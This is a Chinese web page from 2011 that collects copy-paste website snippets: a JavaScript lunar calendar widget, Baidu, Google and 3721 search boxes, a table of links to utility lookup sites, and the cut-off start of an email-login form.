分享

网站常用代码(2)

 书の魂 2011-04-23
网站常用代码(2)


网站常用代码
整理日期:2011年4月22日  本页面已被访问0 次

阴阳日历代码:

<script language="JavaScript">
<!--
var bsYear;
var bsDate;
var bsWeek;
var arrLen=8; file://数组长度
var sValue=0; file://当年的秒数
var dayiy=0; file://当年第几天
var miy=0; file://月份的下标
var iyear=0; file://年份标记
var dayim=0; file://当月第几天
var spd=86400; file://每天的秒数
var year1999="30;29;29;30;29;29;30;29;30;30;30;29"; file://354
var year2000="30;30;29;29;30;29;29;30;29;30;30;29"; file://354
var year2001="30;30;29;30;29;30;29;29;30;29;30;29;30"; file://384
var year2002="30;30;29;30;29;30;29;29;30;29;30;29"; file://354
var year2003="30;30;29;30;30;29;30;29;29;30;29;30"; file://355
var year2004="29;30;29;30;30;29;30;29;30;29;30;29;30"; file://384
var year2005="29;30;29;30;29;30;30;29;30;29;30;29"; file://354
var year2006="30;29;30;29;30;30;29;29;30;30;29;29;30";
var month1999="正月;二月;三月;四月;五月;六月;七月;八月;九月;十月;十一月;十二月"
var month2001="正月;二月;三月;四月;闰四月;五月;六月;七月;八月;九月;十月;十一月;十二月"
var month2004="正月;二月;闰二月;三月;四月;五月;六月;七月;八月;九月;十月;十一月;十二月"
var month2006="正月;二月;三月;四月;五月;六月;七月;闰七月;八月;九月;十月;十一月;十二月"
var Dn="初一;初二;初三;初四;初五;初六;初七;初八;初九;初十;十一;十二;十三;十四;十五;十六;十七;十八;十九;二十;廿一;廿二;廿三;廿四;廿五;廿六;廿七;廿八;廿九;三十";
var Ys=new Array(arrLen);
Ys[0]=919094400;Ys[1]=949680000;Ys[2]=980265600;
Ys[3]=1013443200;Ys[4]=1044028800;Ys[5]=1074700800;
Ys[6]=1107878400;Ys[7]=1138464000;
var Yn=new Array(arrLen); file://农历年的名称
Yn[0]="己卯年";Yn[1]="庚辰年";Yn[2]="辛巳年";
Yn[3]="壬午年";Yn[4]="癸未年";Yn[5]="甲申年";
Yn[6]="乙酉年";Yn[7]="丙戌年";
var D=new Date();
var yy=D.getYear();
var mm=D.getMonth()+1;
var dd=D.getDate();
var ww=D.getDay();
if (ww==0) ww="<font color=RED>星期日";
if (ww==1) ww="星期一";
if (ww==2) ww="星期二";
if (ww==3) ww="星期三";
if (ww==4) ww="星期四";
if (ww==5) ww="星期五";
if (ww==6) ww="<font color=RED>星期六";
ww=ww;
var ss=parseInt(D.getTime() / 1000);
if (yy<100) yy="19"+yy;
for (i=0;i<arrLen;i++)
if (ss>=Ys[i]){
iyear=i;
sValue=ss-Ys[i]; file://当年的秒数
}
dayiy=parseInt(sValue/spd)+1; file://当年的天数
var dpm=year1999;
if (iyear==1) dpm=year2000;
if (iyear==2) dpm=year2001;
if (iyear==3) dpm=year2002;
if (iyear==4) dpm=year2003;
if (iyear==5) dpm=year2004;
if (iyear==6) dpm=year2005;
if (iyear==7) dpm=year2006;
dpm=dpm.split(";");
var Mn=month1999;
if (iyear==2) Mn=month2001;
if (iyear==5) Mn=month2004;
if (iyear==7) Mn=month2006;
Mn=Mn.split(";");
var Dn="初一;初二;初三;初四;初五;初六;初七;初八;初九;初十;十一;十二;十三;十四;十五;十六;十七;十八;十九;二十;廿一;廿二;廿三;廿四;廿五;廿六;廿七;廿八;廿九;三十";
Dn=Dn.split(";");
dayim=dayiy;
var total=new Array(13);
total[0]=parseInt(dpm[0]);
for (i=1;i<dpm.length-1;i++) total[i]=parseInt(dpm[i])+total[i-1];
for (i=dpm.length-1;i>0;i--)
if (dayim>total[i-1]){
dayim=dayim-total[i-1];
miy=i;
}
bsWeek=ww;
bsDate=yy+"年"+mm+"月";
bsDate2=dd;
bsYear="农历"+Yn[iyear];
bsYear2=Mn[miy]+Dn[dayim-1];
if (ss>=Ys[7]||ss<Ys[0]) bsYear=Yn[7];
function CAL(){
document.write("<table border='1' cellspacing='3' width='105' bordercolor='#000000' bgcolor='#FFFFFF' height='110' cellpadding='2'");
document.write("<tr><td align='center'><b><font color=#008040>"+bsDate+"</font><br><font face='Arial' size='6' color=#FF8040>"+bsDate2+"</font><br><font color=#008040><span style='FONT-SIZE: 10.5pt'>");
document.write(bsWeek+"</span><br>"+"<br></b><font color=#9B4E00>");
document.write(bsYear+"<br>"+bsYear2+"</td></tr></table>");
}
file://-->
</script>
<script language="javascript">CAL();</script>

 

3721搜索代码

<script src="http://union./custom.js?pid=S_jshqy_43185&pid1=U_jshqy_43186&SearchHeight=200&SearchWidth=160&boxColor=clarity&TextLength=2&Border=1&SearchList=1&Key=1001,1002,1008,1015,1018,1019,1022,3005,3006,3007,3010,3011,1,2,3,4,5,6,7,8,9,11,14,15,16,17,18,20,22,23,24,25,26,27,28,30,32,33,34,36,38,39,41,43,44,47,50,52,53,57,59,62,64,65,69,71,73,74,75,78,81,87,90,97,98,99,0"></script>

百度搜索代码

<TABLE border=0 cellPadding=0 cellSpacing=0 width=140>
<TBODY>
<TR>
<TD bgColor=#ffffff width=1></TD>
<TD align=middle bgColor=#ffffff height=20 width=114>
<TABLE align=center bgColor=white border=0 cellPadding=3 cellSpacing=2 height=55 width=138><!--DWLayoutTable--><A href="http://ad./ebar.asp?user=cdc460&jump=0&url=http://www.baidu.com/" target=_blank>
<CENTER><IMG align=bottom alt=百度中文搜索 border=0 src="http://img.baidu.com/search/img/baidulogo_clarity_80_29.gif"></CENTER></A>
<TBODY>
<TR>
<FORM action=http://www1.baidu.com/baidu id=query method=get name=query target=_blank>
<TD align=middle bgColor=#ffffff vAlign=center width=137><INPUT align=center id=word maxLength=10 name=word onblur="if (value ==''){value='.'}" onclick="if(this.value=='.')this.value=''" onfocus=this.select() onmouseover=this.focus() size=13 value=.> <INPUT name=Submit type=submit value=百度搜索> </TD></FORM></TR></TBODY></TABLE></TD>
<TD bgColor=#ffffff width=1></TD></TR>
<TR>
<TD colSpan=3><IMG border=0 height=2 src="http://www./moban/3/bbg181.gif" width="100%"></TD></TR></TBODY></TABLE>

google 搜索代码

<CENTER>
<FORM action=http://www.google.com/search method=get>
<TABLE bgColor=#ffffff>
<TBODY>
<TR>
<TD>
<P><A href="http://www.google.com/intl/zh-CN/"><IMG align=absMiddle alt=Google border=0 src="http://www.google.com/logos/Logo_40wht.gif" style="HEIGHT: 45px; WIDTH: 69px"></A> <INPUT maxLength=255 name=q size=31 style="HEIGHT: 21px; WIDTH: 73px" value=> </P>
<P><INPUT name=hl style="HEIGHT: 21px; WIDTH: 48px" type=hidden value=zh-CN> <INPUT name=btnG type=submit value="Google 搜索"> </P></TD></TR></TBODY></TABLE></FORM>
<FORM action=http://www.google.com/search method=get> </FORM></CENTER><!-- Search Google

实用工具查询代码

 

<TABLE align=left border=0 cellPadding=0 cellSpacing=1 style="WIDTH: 100%; mso-cellspacing: .7pt; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-table-overlap: never; mso-table-lspace: 9.0pt; mso-table-rspace: 9.0pt; mso-table-anchor-vertical: paragraph; mso-table-anchor-horizontal: column; mso-table-left: left; mso-table-top: .05pt" width="100%">
<TBODY>
<TR style="HEIGHT: 12.05pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><FONT color=#ff0000><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://qqx.tencent.com/nom.shtml" target=_parent><FONT color=#ff0000><SPAN style="FONT-FAMILY: 宋体">[ </SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">免费</SPAN><SPAN style="FONT-FAMILY: 宋体">QQ</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">申请</SPAN></FONT><SPAN style="FONT-FAMILY: 宋体"><FONT color=#ff0000> </FONT><FONT color=#ff0000>]</FONT></SPAN></A></SPAN><SPAN lang=EN-US style="FONT-FAMILY: 宋体; FONT-SIZE: 12pt"><?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></SPAN></FONT></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">英语在线翻译</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><FONT color=#ff0000><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="index.asp?xAction=xreadnews&NewsID=95" target=_parent><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">邮编电话区号</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></FONT></P></TD></TR>
<TR style="HEIGHT: 13.1pt">
<TD style="HEIGHT: 13.1pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./units.htm"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">度量制式转换</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./anquan.htm"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">妇女查安全期</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./info/qpindex.shtml"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">今日外汇牌价</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./historic.asp"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">历史上的今天</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://train./"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">列车时刻查询</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 13.1pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 13.1pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">飞机航班查询</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://star./"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">焦点神奇算命</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www.lottery.gov.cn/"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">体育彩票查询</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 12.05pt">
<TD style="HEIGHT: 12.05pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">全球天气查询</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: #003366; FONT-FAMILY: 宋体; FONT-SIZE: 9pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 13.1pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 13.1pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="index.asp?xAction=xReadnews&newsid=319" target=_parent><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">装机工具软件</SPAN></A>]</SPAN><SPAN lang=EN-US style="FONT-FAMILY: 宋体; FONT-SIZE: 12pt"><o:p></o:p></SPAN></P></TD></TR></TBODY></TABLE>
<P align=left class=MsoNormal style="TEXT-ALIGN: left; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-pagination: widow-orphan"><SPAN lang=EN-US><BR clear=all style="mso-special-character: line-break"></SPAN><SPAN lang=EN-US style="FONT-FAMILY: 宋体; FONT-SIZE: 12pt; mso-font-kerning: 0pt"><o:p></o:p></SPAN></P>
<TABLE align=left border=0 cellPadding=0 cellSpacing=1 style="WIDTH: 100%; mso-cellspacing: .7pt; mso-padding-alt: 0cm 0cm 0cm 0cm; mso-table-overlap: never; mso-table-lspace: 9.0pt; mso-table-rspace: 9.0pt; mso-table-anchor-vertical: paragraph; mso-table-anchor-horizontal: column; mso-table-left: left; mso-table-top: .05pt" width="100%">
<TBODY>
<TR style="HEIGHT: 13.65pt">
<TD style="HEIGHT: 13.65pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://stock.sina.com.cn/cgi-bin/stock/quote/lookup.cgi"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">股票行情查询</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="COLOR: blue; FONT-FAMILY: 宋体; FONT-SIZE: 12pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 13.65pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 13.65pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://www./search/"><SPAN style="FONT-FAMILY: 宋体">[MP3 </SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">超级搜索</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="FONT-FAMILY: 宋体; FONT-SIZE: 12pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 13.65pt">
<TD style="HEIGHT: 13.65pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="index.asp?xAction=xReadNews&NewsID=323"><SPAN style="FONT-FAMILY: 宋体">[</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">看本机</SPAN><SPAN style="FONT-FAMILY: 宋体">IP</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">地址</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="FONT-FAMILY: 宋体; FONT-SIZE: 12pt"><o:p></o:p></SPAN></P></TD></TR>
<TR style="HEIGHT: 14.8pt">
<TD style="BACKGROUND: #e1f0d7; HEIGHT: 14.8pt; PADDING-BOTTOM: 0cm; PADDING-LEFT: 0cm; PADDING-RIGHT: 0cm; PADDING-TOP: 0cm; WIDTH: 99.66%" width="99%">
<P align=center class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center; WORD-BREAK: break-all; mso-line-height-rule: exactly; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-element: frame; mso-element-frame-hspace: 9.0pt; mso-element-wrap: around; mso-element-anchor-vertical: paragraph; mso-element-anchor-horizontal: column; mso-element-top: .05pt; mso-height-rule: exactly"><SPAN lang=EN-US style="COLOR: #003366; FONT-SIZE: 9pt"><A href="http://ip./"><SPAN style="FONT-FAMILY: 宋体">[IP</SPAN><SPAN style="FONT-FAMILY: 宋体; mso-ascii-font-family: 'Times New Roman'; mso-hansi-font-family: 'Times New Roman'">地址探索者</SPAN><SPAN style="FONT-FAMILY: 宋体">]</SPAN></A></SPAN><SPAN lang=EN-US style="FONT-FAMILY: 宋体; FONT-SIZE: 12pt"><o:p></o:p></SPAN></P></TD></TR></TBODY></TABLE><SPAN lang=EN-US style="FONT-FAMILY: 'Times New Roman'; FONT-SIZE: 10.5pt; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: 宋体; mso-font-kerning: 1.0pt; mso-ansi-language: EN-US; mso-fareast-language: ZH-CN; mso-bidi-language: AR-SA"><BR clear=all style="mso-special-character: line-break"></SPAN>

登陆邮箱代码

 

<TABLE bgColor=#f0f7ff border=0 cellPadding=0 cellSpacing=0 height=1 width=110 valign="top">
<TBODY>
<TR>
<TD height=1 width=10>
<FORM action=http://219.129.20.144:8000/sendmail.asp method=post name=loginmail onsubmit="return chkinput2(this);" target=_blank></TD>
<CENTER><FONT color=#ff0000>注意:</FONT>首先请选择邮箱</CENTER>
